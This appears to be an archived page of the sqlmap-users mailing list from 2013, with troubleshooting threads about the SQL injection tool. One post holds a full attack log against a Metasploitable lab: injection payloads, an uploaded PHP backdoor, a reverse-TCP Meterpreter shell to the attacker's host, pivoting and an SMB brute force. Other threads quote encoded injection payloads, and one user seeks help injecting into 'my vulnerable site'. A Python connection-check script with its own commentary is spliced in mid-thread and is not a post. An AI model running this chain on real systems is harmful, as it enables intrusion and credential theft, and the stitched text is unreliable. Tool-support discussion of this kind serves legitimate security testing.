sqlmap-users Mailing List for sqlmap (Page 29)
From: Chris O. <chr...@gm...> - 2013-10-31 21:06:02

I'd imagine that if you want answers, you're going to have to give a little more information than that.

On 29 October 2013 18:39, remi driessens <rem...@ho...> wrote:

> hi developers from sqlmap
>
> i have a problem with sqlmap every time i do this on my vulnerable site it
> gives me all tested parameters appear to be not injectable. try to increase
> --level / --risk values to perform more tests...
>
> and if i do sql manually i can get in the database of the website :s i've
> noticed this testing 'MySQL union query (NULL) - 1 to 10 columns my
> website has 18 columns and the vulnerable column is 12 i thought maybe this
> is the problem ? i hope you can bring me some answers
From: remi d. <rem...@ho...> - 2013-10-29 18:39:26

hi developers from sqlmap

i have a problem with sqlmap every time i do this on my vulnerable site it gives me all tested parameters appear to be not injectable. try to increase --level / --risk values to perform more tests...

and if i do sql manually i can get in the database of the website :s i've noticed this testing 'MySQL union query (NULL) - 1 to 10 columns my website has 18 columns and the vulnerable column is 12 i thought maybe this is the problem ? i hope you can bring me some answers
From: Miroslav S. <mir...@gm...> - 2013-10-24 22:04:10

Hi.

"Does sqlmap need a specific version of these files?" - not really. It just needs to be compatible with the current Python version.

Kind regards,
Miroslav Stampar

On Thu, Oct 24, 2013 at 4:55 PM, Brian Milliron <Br...@ec...> wrote:

> Thanks for the sample command and output. It turns out there was a case
> sensitivity issue. oracle:// vs Oracle://. Once I solved that, sqlmap
> began complaining about a missing cx_Oracle.py. The Kali installation it
> seems is missing the Oracle client and python libraries. Does sqlmap
> need a specific version of these files?
>
> > Hi.
> >
> > sqlmap supports it. Sample console output:
> >
> > $ python sqlmap.py -d "oracle://SYSTEM:testpass@192.168.5.27:1521/testdb" -v 5 --banner
> >
> >     sqlmap/1.0-dev-8dac47f - automatic SQL injection and database takeover tool
> >     http://sqlmap.org
> >
> > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> > mutual consent is illegal. It is the end user's responsibility to obey all
> > applicable local, state and federal laws. Developers assume no liability
> > and are not responsible for any misuse or damage caused by this program
> >
> > [*] starting at 20:15:37
> >
> > [20:15:37] [DEBUG] cleaning up configuration parameters
> > [20:15:37] [DEBUG] forcing timeout to 10 seconds
> > [20:15:37] [INFO] connection to oracle server 192.168.5.27:1521 established
> > [20:15:37] [INFO] the back-end DBMS is Oracle
> > [20:15:37] [INFO] fetching banner
> > [20:15:37] [PAYLOAD] SELECT NVL(CAST(banner AS VARCHAR(4000)),' ') FROM v$version WHERE ROWNUM=1
> > back-end DBMS: Oracle
> > banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
> > [20:15:37] [INFO] connection to oracle server 192.168.5.27:1521 closed
> >
> > [*] shutting down at 20:15:37
> >
> > Could you please check that you run the latest revision from the Github
> > repository and try to run it with -v 5? Strange thing with your case is
> > "sqlmap was not able to fingerprint..." while there is no fingerprinting in
> > sqlmap's direct mode (at least in HEAD revision).
> >
> > Kind regards,
> > Miroslav Stampar

--
Miroslav Stampar
http://about.me/stamparm
From: Brian M. <Br...@EC...> - 2013-10-24 14:56:15

Thanks for the sample command and output. It turns out there was a case sensitivity issue. oracle:// vs Oracle://. Once I solved that, sqlmap began complaining about a missing cx_Oracle.py. The Kali installation it seems is missing the Oracle client and python libraries. Does sqlmap need a specific version of these files?

> Hi.
>
> sqlmap supports it. Sample console output:
>
> $ python sqlmap.py -d "oracle://SYSTEM:testpass@192.168.5.27:1521/testdb" -v 5 --banner
>
>     sqlmap/1.0-dev-8dac47f - automatic SQL injection and database takeover tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 20:15:37
>
> [20:15:37] [DEBUG] cleaning up configuration parameters
> [20:15:37] [DEBUG] forcing timeout to 10 seconds
> [20:15:37] [INFO] connection to oracle server 192.168.5.27:1521 established
> [20:15:37] [INFO] the back-end DBMS is Oracle
> [20:15:37] [INFO] fetching banner
> [20:15:37] [PAYLOAD] SELECT NVL(CAST(banner AS VARCHAR(4000)),' ') FROM v$version WHERE ROWNUM=1
> back-end DBMS: Oracle
> banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
> [20:15:37] [INFO] connection to oracle server 192.168.5.27:1521 closed
>
> [*] shutting down at 20:15:37
>
> Could you please check that you run the latest revision from the Github
> repository and try to run it with -v 5? Strange thing with your case is
> "sqlmap was not able to fingerprint..." while there is no fingerprinting in
> sqlmap's direct mode (at least in HEAD revision).
>
> Kind regards,
> Miroslav Stampar
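The two failure points in this exchange (scheme case in the `-d` string and a missing `cx_Oracle` module) can be checked before sqlmap is started. The sketch below is an added example, not part of the thread or of sqlmap; `preflight`, `DRIVERS` and the `mysql`/`postgresql` rows are assumptions made for illustration, and it also produces a password-redacted form of the string for logs and tickets.

```python
import importlib.util
import re
from dataclasses import dataclass, field

# Scheme -> Python driver module. Only oracle/cx_Oracle comes from the thread;
# the other two rows are assumptions added for illustration.
DRIVERS = {"oracle": "cx_Oracle", "mysql": "pymysql", "postgresql": "psycopg2"}

# DBMS://USER:PASSWORD@HOST:PORT/DATABASE, the shape of the sample command.
DSN_RE = re.compile(
    r"^(?P<scheme>[A-Za-z]+)://(?P<user>[^:@/]+):(?P<password>[^@]*)@"
    r"(?P<host>[^:/@]+):(?P<port>\d+)/(?P<db>\S+)$"
)


@dataclass
class Preflight:
    redacted: str                                   # safe to log: password masked
    problems: list = field(default_factory=list)    # human-readable findings


def _importable(module):
    """True when the module can be found by the running interpreter."""
    return importlib.util.find_spec(module) is not None


def preflight(dsn, importable=_importable):
    """Check a direct-connection string without connecting to anything."""
    m = DSN_RE.match(dsn)
    if not m:
        return Preflight(
            "<unparsed>",
            ["does not match DBMS://USER:PASSWORD@HOST:PORT/DATABASE"],
        )

    scheme = m["scheme"]
    result = Preflight(
        f"{scheme.lower()}://{m['user']}:***@{m['host']}:{m['port']}/{m['db']}"
    )

    # The thread reports a case-sensitivity problem; the sample command that
    # worked is all lowercase, so anything else is flagged.
    if scheme != scheme.lower():
        result.problems.append(
            f"scheme {scheme!r} is not lowercase; the sample command in the "
            f"thread uses {scheme.lower()!r}"
        )

    if not 0 < int(m["port"]) < 65536:
        result.problems.append(f"port {m['port']} is outside 1-65535")

    driver = DRIVERS.get(scheme.lower())
    if driver is None:
        result.problems.append(f"no driver mapping for {scheme.lower()!r} in this sketch")
    elif not importable(driver):
        result.problems.append(
            f"Python module {driver!r} is not importable by this interpreter"
        )
    return result


if __name__ == "__main__":
    # Connection string taken from the sample command, with the scheme
    # capitalised to reproduce the reported case problem.
    report = preflight("Oracle://SYSTEM:testpass@192.168.5.27:1521/testdb")
    print(report.redacted)
    for problem in report.problems:
        print(" -", problem)
```

The driver check uses the interpreter that runs the script, so it has to be run with the same Python that runs sqlmap.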
From: Soner T. <son...@ho...> - 2013-10-24 13:24:04

Hi All,

I know that the meterpreter option in sqlmap is beta (as reported in parentheses during the payload selection). So is it expected that I am having problems with pivoting using the meterpreter session opened by sqlmap? Simple command execution on the meterpreter session seems to work fine though.

For example, I can successfully open a meterpreter session using Metasploitable/Mutillidae login page. Then, I background the session and add a route to the target network using a command like the following on the metasploit command prompt:

route add 10.0.0.0 255.255.255.0 1

which seems to be successful. After that, I try to run smb_login scanner on a computer on the target network, such as 10.0.0.3. But when I listen to the traffic on 10.0.0.3, I can see only a few packets arriving to the machine. Otherwise, a similar smb_login run on metasploit without pivoting produces hundreds of packets, i.e. smb login attempts. And if I try to run another scanner (such as the tcp port scanner) immediately afterwards, the meterpreter session dies.

Please see below the output I have captured of the example above (sorry for the escape sequences for coloring). Based on the SSL errors at the end, I believe that this issue may be related with SSL.

Does anybody see any mistake I am making (I am dealing with this issue for at least a week now)? Or is this a known issue (but I couldn't see a similar report on the issue tracker)? If not, and if somebody else can confirm too, I can submit a bug report as well.

As you can see below my software versions are:

sqlmap/1.0-dev, which is actually 0.9-3340 obtained from github
metasploit v4.7.2-1

I have tried with the original sqlmap and metasploit versions already installed on Kali 1.0 and Backtrack 5, and misc github versions of sqlmap too. They behave worse, and the latest versions I use can at least sustain the meterpreter session for a while before it dies.

Any help would be appreciated.
TIA,

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 17:12:27

[17:12:27] [INFO] testing connection to the target URL
[17:12:28] [INFO] heuristics detected web page charset 'ISO-8859-2'
[17:12:28] [INFO] searching for forms
[#1] form:
POST http://192.168.2.149:80/mutillidae/index.php?page=login.php
POST data: username=&password=&login-php-submit-button=Login
do you want to test this form? [Y/n/q]
>
Edit POST data [default: username=&password=&login-php-submit-button=Login] (Warning: blank fields detected):
do you want to fill blank fields with random values? [Y/n]
[17:12:35] [INFO] resuming back-end DBMS 'mysql'
[17:12:35] [INFO] using '/root/Desktop/sqlmapproject-sqlmap-9f21406/output/results-10232013_0512pm.csv' as the CSV results file in multiple targets mode
[17:12:36] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: username=-8398' OR (6065=6065)#&password=&login-php-submit-button=Login

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: username=eUFX' AND (SELECT 8694 FROM(SELECT COUNT(*),CONCAT(0x7171656271,(SELECT (CASE WHEN (8694=8694) THEN 1 ELSE 0 END)),0x71706f6e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'BIzF'='BIzF&password=&login-php-submit-button=Login

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: username=eUFX' UNION ALL SELECT NULL,CONCAT(0x7171656271,0x6f4c455066514c626261,0x71706f6e71),NULL,NULL,NULL#&password=&login-php-submit-button=Login

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=eUFX' AND 1483=BENCHMARK(5000000,MD5(0x63724c53)) AND 'pgsc'='pgsc&password=&login-php-submit-button=Login
---
do you want to exploit this SQL injection? [Y/n]
[17:12:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[17:12:37] [INFO] fingerprinting the back-end DBMS operating system
[17:12:37] [INFO] the back-end DBMS operating system is Linux
[17:12:37] [INFO] going to use a web backdoor to establish the tunnel
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>
[17:12:38] [INFO] retrieved the web server document root: '/var/www'
[17:12:38] [INFO] retrieved web server full paths: '/var/www/mutillidae/index.php, /var/www/mutillidae/process'
[17:12:38] [INFO] trying to upload the file stager on '/var/www' via LIMIT INTO OUTFILE technique
[17:12:39] [WARNING] reflective value(s) found and filtering out
[17:12:39] [WARNING] unable to upload the file stager on '/var/www'
[17:12:39] [INFO] trying to upload the file stager on '/var/www' via UNION technique
[17:12:39] [WARNING] expect junk characters inside the file as a leftover from UNION query
[17:12:40] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[17:12:40] [INFO] trying to upload the file stager on '/var/www/mutillidae' via LIMIT INTO OUTFILE technique
[17:12:42] [INFO] heuristics detected web page charset 'ascii'
[17:12:42] [INFO] the file stager has been successfully uploaded on '/var/www/mutillidae' - http://192.168.2.149:80/mutillidae/tmpuguhd.php
[17:12:42] [INFO] the backdoor has been successfully uploaded on '/var/www/mutillidae' - http://192.168.2.149:80/mutillidae/tmpbbjkl.php
[17:12:42] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Bind TCP: Listen on the database host for a connection
>
what is the local address? [192.168.2.221]
which local port number do you want to use? [42294]
which payload do you want to use?
[1] Shell (default)
[2] Meterpreter (beta)
>
[17:12:50] [INFO] creation in progress .................. done
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[17:13:10] [INFO] uploading shellcodeexec to '/tmp/tmpsejyxs'
[17:13:10] [INFO] shellcodeexec successfully uploaded
[17:13:10] [INFO] running Metasploit Framework command line interface locally, please wait..
[*] Initializing modules...
PAYLOAD => linux/x86/meterpreter/reverse_tcp
EXITFUNC => process
LPORT => 42294
LHOST => 192.168.2.221
[*] Started reverse handler on 192.168.2.221:42294
[*] Starting the payload handler...
[17:13:31] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.2.149
[*] Meterpreter session 1 opened (192.168.2.221:42294 -> 192.168.2.149:19485) at 2013-10-23 17:13:35 +0300

meterpreter >
[*] Backgrounding session 1...
msf exploit(handler) >
Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                             http://metasploit.pro

       =[ metasploit v4.7.2-1 [core:4.7 api:1.0]
+ -- --=[ 1211 exploits - 733 auxiliary - 202 post
+ -- --=[ 317 payloads - 30 encoders - 8 nops

msf exploit(handler) >
[*] postgresql connected to msf3
msf exploit(handler) >

Active sessions
===============

  Id  Type                   Information                                                                  Connection
  --  ----                   -----------                                                                  ----------
  1   meterpreter x86/linux  uid=33, gid=33, euid=33, egid=33, suid=33, sgid=33 @ metasploitable          192.168.2.221:42294 -> 192.168.2.149:19485 (10.0.0.2)

msf exploit(handler) >
[*] Route added
msf exploit(handler) >

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.0.0.0           255.255.255.0      Session 1

msf exploit(handler) >
msf auxiliary(smb_login) >

Module options (auxiliary/scanner/smb/smb_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASS_FILE                          no        File containing passwords, one per line
   PRESERVE_DOMAINS  true             no        Respect a username that contains a domain name.
   RECORD_GUEST      false            no        Record guest-privileged random logins to the database
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             445              yes       Set the SMB service port
   SMBDomain                          no        SMB Domain
   SMBPass                            no        SMB Password
   SMBUser                            no        SMB Username
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(smb_login) >
RHOSTS => 10.0.0.3
msf auxiliary(smb_login) >
USER_FILE => /root/user
msf auxiliary(smb_login) >
PASS_FILE => /root/pass
msf auxiliary(smb_login) >

Module options (auxiliary/scanner/smb/smb_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASS_FILE         /root/pass       no        File containing passwords, one per line
   PRESERVE_DOMAINS  true             no        Respect a username that contains a domain name.
   RECORD_GUEST      false            no        Record guest-privileged random logins to the database
   RHOSTS            10.0.0.3         yes       The target address range or CIDR identifier
   RPORT             445              yes       Set the SMB service port
   SMBDomain                          no        SMB Domain
   SMBPass                            no        SMB Password
   SMBUser                            no        SMB Username
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE         /root/user       no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(smb_login) >
[*] 10.0.0.3:445 SMB - Starting SMB login bruteforce
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_login) >
msf auxiliary(tcp) >

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf auxiliary(tcp) >
RHOSTS => 10.0.0.3
msf auxiliary(tcp) >
PORTS => 1-100
msf auxiliary(tcp) >
THREADS => 10
msf auxiliary(tcp) >

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   PORTS        1-100            yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       10.0.0.3         yes       The target address range or CIDR identifier
   THREADS      10               yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf auxiliary(tcp) >
[-] 10.0.0.3:5 exception OpenSSL::SSL::SSLError SSL_write:: bad write retry
["/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `syswrite'",
 "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `do_write'",
 "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:336:in `write'",
 "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/ssl_tcp.rb:151:in `write'",
 "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:157:in `block in send_packet'",
 "<internal:prelude>:10:in `synchronize'",
 "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:155:in `send_packet'",
 "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:212:in `send_packet_wait_response'",
 "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:188:in `send_request'",
 "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/channel.rb:116:in `create'",
 "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:92:in `open'",
 "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:103:in `create_tcp_client_channel'",
 "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:74:in `create'",
 "/opt/metasploit2/apps/pro/msf3/lib/msf/base/sessions/meterpreter.rb:449:in `create'",
 "/opt/metasploit2/apps/pro/msf3/lib/rex/socket.rb:47:in `create_param'",
 "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:37:in `create_param'",
 "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:28:in `create'",
 "/opt/metasploit2/apps/pro/msf3/lib/msf/core/exploit/tcp.rb:100:in `connect'",
 "/opt/metasploit2/apps/pro/msf3/modules/auxiliary/scanner/portscan/tcp.rb:59:in `block (2 levels) in run_host'",
 "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `call'",
 "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `block in spawn'"]
[-] 10.0.0.3:6 exception OpenSSL::SSL::SSLError SSL_write:: bad write retry
[-] 10.0.0.3:7 exception OpenSSL::SSL::SSLError SSL_write:: bad write retry
[-] 10.0.0.3:8 exception OpenSSL::SSL::SSLError SSL_write:: bad write retry
[-] 10.0.0.3:9 exception OpenSSL::SSL::SSLError SSL_write:: bad write retry
[-] 10.0.0.3:1 exception OpenSSL::SSL::SSLError SSL_write:: bad write retry
[-] 10.0.0.3:3 exception OpenSSL::SSL::SSLError SSL_write:: bad write retry
[-] 10.0.0.3:4 exception Errno::EPIPE Broken pipe
"/opt/metasploit2/apps/pro/msf3/modules/auxiliary/scanner/portscan/tcp.rb:59:in `block (2 levels) in run_host'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `call'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `block in spawn'"] [1m[34m[*][0m 10.0.0.2 - Meterpreter session 1 closed. Reason: Died [1m[34m[*][0m Scanned 1 of 1 hosts (100% complete) [1m[34m[*][0m Auxiliary module execution completed [4mmsf[0m auxiliary([1m[31mtcp[0m) [0m> [0m [08:25:28] [INFO] cleaning up the web files uploaded [08:25:28] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 2 times [08:25:28] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/Desktop/sqlmapproject-sqlmap-9f21406/output/results-10232013_0512pm.csv' [*] shutting down at 08:25:28 |
From: Andres R. <and...@gm...> - 2013-10-23 17:26:25
|
Thanks! Now I'm getting better results ;)

On Wed, Oct 23, 2013 at 1:08 PM, Miroslav Stampar <mir...@gm...> wrote:
> It should be fixed now :)
>
> Bye
>
> On Wed, Oct 23, 2013 at 5:55 PM, Andres Riancho <and...@gm...> wrote:
>>
>> All right, thanks! :)
>>
>> On Wed, Oct 23, 2013 at 12:20 PM, Miroslav Stampar <mir...@gm...> wrote:
>> > Hi Andres.
>> >
>> > Expect a fix ASAP (<1 hour).
>> >
>> > Bye
>> >
>> > On Oct 23, 2013 5:18 PM, "Andres Riancho" <and...@gm...> wrote:
>> >>
>> >> I'm capturing sqlmap's traffic using burp and I see:
>> >>
>> >> %5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_frmContact%5C%22%5C%29%5C%29%5C%29%5C%20RLIKE%5C%20%5C%28SELECT%5C%20%5C%28CASE%5C%20WHEN%5C%20%5C%282371%5C=2371%5C%29%5C%20THEN%5C%200x66726d436f6e74616374%5C%20ELSE%5C%200x28%5C%20END%5C%29%5C%29%5C%20AND%5C%20%5C%28%5C%28%5C%28%5C%22aruB%5C%22%5C%20LIKE%5C%20%5C%22aruB%5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_
>> >>
>> >> Decoded:
>> >>
>> >> \_\_PAYLOAD\_DELIMITER\_\_frmContact\"\)\)\)\ RLIKE\ \(SELECT\ \(CASE\ WHEN\ \(2371\=2371\)\ THEN\ 0x66726d436f6e74616374\ ELSE\ 0x28\ END\)\)\ AND\ \(\(\(\"aruB\"\ LIKE\ \"aruB\_\_PAYLOAD\_DELIMITER\_\_
>> >>
>> >> I suspect that PAYLOAD_DELIMITER was intended to be replaced before
>> >> being sent?
>> >>
>> >> Also, what's with all the %5C? There is also a strange thing in this
>> >> request "RLIKE", which I suppose should be "OR LIKE" ?
>> >>
>> >> sqlmap/1.0-dev-28529a9
>>
>> --
>> Andrés Riancho
>> Project Leader at w3af - http://w3af.org/
>> Web Application Attack and Audit Framework
>> Twitter: @w3af
>> GPG: 0x93C344F3
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3 |
From: Miroslav S. <mir...@gm...> - 2013-10-23 16:09:02
|
It should be fixed now :)

Bye

On Wed, Oct 23, 2013 at 5:55 PM, Andres Riancho <and...@gm...> wrote:
> All right, thanks! :)
>
> On Wed, Oct 23, 2013 at 12:20 PM, Miroslav Stampar <mir...@gm...> wrote:
> > Hi Andres.
> >
> > Expect a fix ASAP (<1 hour).
> >
> > Bye
> >
> > On Oct 23, 2013 5:18 PM, "Andres Riancho" <and...@gm...> wrote:
> >>
> >> I'm capturing sqlmap's traffic using burp and I see:
> >>
> >> %5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_frmContact%5C%22%5C%29%5C%29%5C%29%5C%20RLIKE%5C%20%5C%28SELECT%5C%20%5C%28CASE%5C%20WHEN%5C%20%5C%282371%5C=2371%5C%29%5C%20THEN%5C%200x66726d436f6e74616374%5C%20ELSE%5C%200x28%5C%20END%5C%29%5C%29%5C%20AND%5C%20%5C%28%5C%28%5C%28%5C%22aruB%5C%22%5C%20LIKE%5C%20%5C%22aruB%5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_
> >>
> >> Decoded:
> >>
> >> \_\_PAYLOAD\_DELIMITER\_\_frmContact\"\)\)\)\ RLIKE\ \(SELECT\ \(CASE\ WHEN\ \(2371\=2371\)\ THEN\ 0x66726d436f6e74616374\ ELSE\ 0x28\ END\)\)\ AND\ \(\(\(\"aruB\"\ LIKE\ \"aruB\_\_PAYLOAD\_DELIMITER\_\_
> >>
> >> I suspect that PAYLOAD_DELIMITER was intended to be replaced before
> >> being sent?
> >>
> >> Also, what's with all the %5C? There is also a strange thing in this
> >> request "RLIKE", which I suppose should be "OR LIKE" ?
> >>
> >> sqlmap/1.0-dev-28529a9
>
> --
> Andrés Riancho
> Project Leader at w3af - http://w3af.org/
> Web Application Attack and Audit Framework
> Twitter: @w3af
> GPG: 0x93C344F3

--
Miroslav Stampar
http://about.me/stamparm |
From: Andres R. <and...@gm...> - 2013-10-23 15:56:19
|
All right, thanks! :)

On Wed, Oct 23, 2013 at 12:20 PM, Miroslav Stampar <mir...@gm...> wrote:
> Hi Andres.
>
> Expect a fix ASAP (<1 hour).
>
> Bye
>
> On Oct 23, 2013 5:18 PM, "Andres Riancho" <and...@gm...> wrote:
>>
>> I'm capturing sqlmap's traffic using burp and I see:
>>
>> %5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_frmContact%5C%22%5C%29%5C%29%5C%29%5C%20RLIKE%5C%20%5C%28SELECT%5C%20%5C%28CASE%5C%20WHEN%5C%20%5C%282371%5C=2371%5C%29%5C%20THEN%5C%200x66726d436f6e74616374%5C%20ELSE%5C%200x28%5C%20END%5C%29%5C%29%5C%20AND%5C%20%5C%28%5C%28%5C%28%5C%22aruB%5C%22%5C%20LIKE%5C%20%5C%22aruB%5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_
>>
>> Decoded:
>>
>> \_\_PAYLOAD\_DELIMITER\_\_frmContact\"\)\)\)\ RLIKE\ \(SELECT\ \(CASE\ WHEN\ \(2371\=2371\)\ THEN\ 0x66726d436f6e74616374\ ELSE\ 0x28\ END\)\)\ AND\ \(\(\(\"aruB\"\ LIKE\ \"aruB\_\_PAYLOAD\_DELIMITER\_\_
>>
>> I suspect that PAYLOAD_DELIMITER was intended to be replaced before
>> being sent?
>>
>> Also, what's with all the %5C? There is also a strange thing in this
>> request "RLIKE", which I suppose should be "OR LIKE" ?
>>
>> sqlmap/1.0-dev-28529a9

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3 |
From: Miroslav S. <mir...@gm...> - 2013-10-23 15:20:15
|
Hi Andres.

Expect a fix ASAP (<1 hour).

Bye

On Oct 23, 2013 5:18 PM, "Andres Riancho" <and...@gm...> wrote:
> I'm capturing sqlmap's traffic using burp and I see:
>
> %5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_frmContact%5C%22%5C%29%5C%29%5C%29%5C%20RLIKE%5C%20%5C%28SELECT%5C%20%5C%28CASE%5C%20WHEN%5C%20%5C%282371%5C=2371%5C%29%5C%20THEN%5C%200x66726d436f6e74616374%5C%20ELSE%5C%200x28%5C%20END%5C%29%5C%29%5C%20AND%5C%20%5C%28%5C%28%5C%28%5C%22aruB%5C%22%5C%20LIKE%5C%20%5C%22aruB%5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_
>
> Decoded:
>
> \_\_PAYLOAD\_DELIMITER\_\_frmContact\"\)\)\)\ RLIKE\ \(SELECT\ \(CASE\ WHEN\ \(2371\=2371\)\ THEN\ 0x66726d436f6e74616374\ ELSE\ 0x28\ END\)\)\ AND\ \(\(\(\"aruB\"\ LIKE\ \"aruB\_\_PAYLOAD\_DELIMITER\_\_
>
> I suspect that PAYLOAD_DELIMITER was intended to be replaced before
> being sent?
>
> Also, what's with all the %5C? There is also a strange thing in this
> request "RLIKE", which I suppose should be "OR LIKE" ?
>
> sqlmap/1.0-dev-28529a9 |
From: Andres R. <and...@gm...> - 2013-10-23 15:17:46
|
I'm capturing sqlmap's traffic using burp and I see:

%5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_frmContact%5C%22%5C%29%5C%29%5C%29%5C%20RLIKE%5C%20%5C%28SELECT%5C%20%5C%28CASE%5C%20WHEN%5C%20%5C%282371%5C=2371%5C%29%5C%20THEN%5C%200x66726d436f6e74616374%5C%20ELSE%5C%200x28%5C%20END%5C%29%5C%29%5C%20AND%5C%20%5C%28%5C%28%5C%28%5C%22aruB%5C%22%5C%20LIKE%5C%20%5C%22aruB%5C_%5C_PAYLOAD%5C_DELIMITER%5C_%5C_

Decoded:

